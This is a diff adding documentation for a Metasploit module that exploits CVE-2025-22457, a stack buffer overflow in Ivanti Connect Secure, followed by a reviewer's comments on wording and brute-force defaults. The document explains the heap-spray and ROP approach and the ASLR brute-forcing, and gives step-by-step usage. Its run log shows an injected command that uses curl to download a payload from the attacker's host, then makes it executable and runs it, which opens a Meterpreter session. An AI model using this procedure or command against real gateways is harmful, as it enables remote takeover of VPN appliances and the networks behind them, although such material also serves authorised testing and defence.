|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +This module exploits a Stack-based Buffer Overflow vulnerability in Ivanti |
| 4 | +Connect Secure to achieve remote code execution (CVE-2025-22457). Versions |
| 5 | +22.7R2.5 and earlier are vulnerable. Note that Ivanti Pulse Connect Secure, |
| 6 | +Ivanti Policy Secure and ZTA gateways are also vulnerable but this module |
| 7 | +doesn't support this software. Heap spray is used to place our payload in |
| 8 | +memory at a predetermined location. Due to ASLR, the base address of |
| 9 | +`libdsplibs` is unknown. This library is used by the exploit to build a ROP |
| 10 | +chain and get command execution. As a result, the module will brute force this |
| 11 | +address starting from the address set by the `LIBDSPLIBS_ADDRESS` option. |
| 12 | + |
| 13 | +Since this module needs to fill the processes memory with a large structure |
| 14 | +using the heap spray technique, it might take a very long time to succeed. The |
| 15 | +execution can be tweeked with the options described below. |
| 16 | + |
| 17 | +Also, since this will create many sockets on your system, you might need to |
| 18 | +increase the file descriptor limit with `ulimit` (e.g. `ulimit -n 65535`). |
| 19 | + |
| 20 | +### Installation Steps |
| 21 | +Get an Ivanti Security Appliance (ISA) or a Virtual Appliances (ISA-V Series) |
| 22 | +with a vulnerable Ivanti Connect Secure installed. |
| 23 | + |
| 24 | +Note that it is not possible to download a trial version of a Virtual Appliance |
| 25 | +unless you contact sales and request a demo. |
| 26 | + |
| 27 | +## Verification Steps |
| 28 | +1. Start msfconsole |
| 29 | +1. Do: `use linux/http/ivanti_connect_secure_stack_overflow_rce_cve_2025_22457` |
| 30 | +1. Do: `exploit verbose=true lhost=<local host> rhosts=<remote host>` |
| 31 | +1. You should get a Meterpreter session |
| 32 | + |
| 33 | + |
| 34 | +## Options |
| 35 | + |
| 36 | +### MAX_THREADS |
| 37 | +The maximum number of threads to use when spraying (default: 32) |
| 38 | + |
| 39 | +### WEB_CHILDREN |
| 40 | +The number of `/home/bin/web` child processes the server uses. It's been |
| 41 | +observed that the number of children the main process forks is directly related |
| 42 | +to the number of vCPUs used by the system. Ivanti recommends having 4 vCPUs, so |
| 43 | +the default number of children is set to 4. |
| 44 | + |
| 45 | +### LIBDSPLIBS_ADDRESS |
| 46 | +The base address of libdsplibs that the module will start with when brute |
| 47 | +forcing. It has been observed that this address is always in the range of |
| 48 | +`0xf6525000`-`0xf6426000`, giving 256 possible options, since the alignment is |
| 49 | +4KB (0x1000 bytes) bytes. As a result, the default value has been set to |
| 50 | +`0xf6426000`. |
| 51 | + |
| 52 | +### BRUTEFORCE_ATTEMPTS |
| 53 | +The number of attempts to brute force the base address of libdsplibs (default: 255). |
| 54 | + |
| 55 | + |
| 56 | +## Scenarios |
| 57 | + |
| 58 | +### Ivanti Connect Secure version 22.7r2.4 b3597 |
| 59 | + |
| 60 | +In this example, the address of libdsplibs is known to speed up the process (0xf64c1000). Also, we know the target system runs with 2 vCPU's. |
| 61 | + |
| 62 | +``` |
| 63 | +msf6 exploit(linux/http/ivanti_connect_secure_stack_overflow_rce_cve_2025_22457) > exploit verbose=true lhost=192.168.222.97 rhosts=192.168.222.222 libdsplibs_address=0xf64c1000 web_children=2 |
| 64 | +[*] Command to run on remote host: curl -so ./pbPNUixqDiK http://192.168.222.97:8080/QAeBnT-6WHJiW5MJjwMrfA;chmod +x ./pbPNUixqDiK;./pbPNUixqDiK& |
| 65 | +[*] Fetch handler listening on 192.168.222.97:8080 |
| 66 | +[*] HTTP server started |
| 67 | +[*] Adding resource /QAeBnT-6WHJiW5MJjwMrfA |
| 68 | +[*] Started reverse TCP handler on 192.168.222.97:4444 |
| 69 | +[*] 192.168.222.222:443 - Running automatic check ("set AutoCheck false" to disable) |
| 70 | +[*] 192.168.222.222:443 - Checking the product version for https://192.168.222.222:443 |
| 71 | +[+] 192.168.222.222:443 - The target appears to be vulnerable. Detected version: 22.7.2.3597 |
| 72 | +[*] 192.168.222.222:443 - shell_cmd: a;export LD_LIBRARY_PATH=/home/lib;curl -so ./pbPNUixqDiK http://192.168.222.97:8080/QAeBnT-6WHJiW5MJjwMrfA;chmod +x ./pbPNUixqDiK;./pbPNUixqDiK& #BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB |
| 73 | +[*] 192.168.222.222:443 - Targeting https://192.168.222.222:443 |
| 74 | +[*] 192.168.222.222:443 - Starting... |
| 75 | +[*] 192.168.222.222:443 - Trying libdsplibs.so @ 0xf64c1000 |
| 76 | +[*] 192.168.222.222:443 - Making connections... |
| 77 | +[*] 192.168.222.222:443 - Spraying... |
| 78 | +[*] 192.168.222.222:443 - Triggering... |
| 79 | +[*] 192.168.222.222:443 - Attempt #1 |
| 80 | +[*] 192.168.222.222:443 - Attempt #2 |
| 81 | +[*] Client 192.168.222.222 requested /QAeBnT-6WHJiW5MJjwMrfA |
| 82 | +[*] Sending payload to 192.168.222.222 (curl/7.80.0-DEV) |
| 83 | +[*] Meterpreter session 1 opened (192.168.222.97:4444 -> 192.168.222.222:16758) at 2025-04-30 21:36:49 +0200 |
| 84 | +[!] 192.168.222.222:443 - Exception: The connection with (192.168.222.222:443) timed out. |
| 85 | +[*] 192.168.222.222:443 - Attempt elapsed time: 222.46986142301466 seconds |
| 86 | +[*] 192.168.222.222:443 - Total elapsed time: 227.48146175200236 seconds |
| 87 | +
|
| 88 | +meterpreter > sysinfo |
| 89 | +Computer : 192.168.222.222 |
| 90 | +OS : CentOS 7.9.2009 (Linux 4.17.00.35-selinux-jailing-production) |
| 91 | +Architecture : x64 |
| 92 | +BuildTuple : x86_64-linux-musl |
| 93 | +Meterpreter : x64/linux |
| 94 | +meterpreter > getuid |
| 95 | +Server username: nr |
| 96 | +``` |
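Review bot: the LIBDSPLIBS_ADDRESS section gives the observed range as `0xf6525000`-`0xf6426000` (upper bound written first) and states 256 possible 4KB-aligned values, yet BRUTEFORCE_ATTEMPTS defaults to 255; starting from the default `0xf6426000` and stepping by 0x1000, 255 attempts end at 0xf6524000 and never reach 0xf6525000 unless the counter is zero-based, so please write the range low-to-high and either confirm the default covers every candidate or raise it to 256 to match. Same file, wording: "fill the processes memory" should read "fill the process's memory", "tweeked" should be "tweaked", and "a Virtual Appliances (ISA-V Series)" should be "a Virtual Appliance (ISA-V Series)". In the Options section it would also help operators if MAX_THREADS noted that the `ulimit -n` advice scales with both thread count and WEB_CHILDREN, since the intro already warns about socket exhaustion but the option descriptions do not tie the two together.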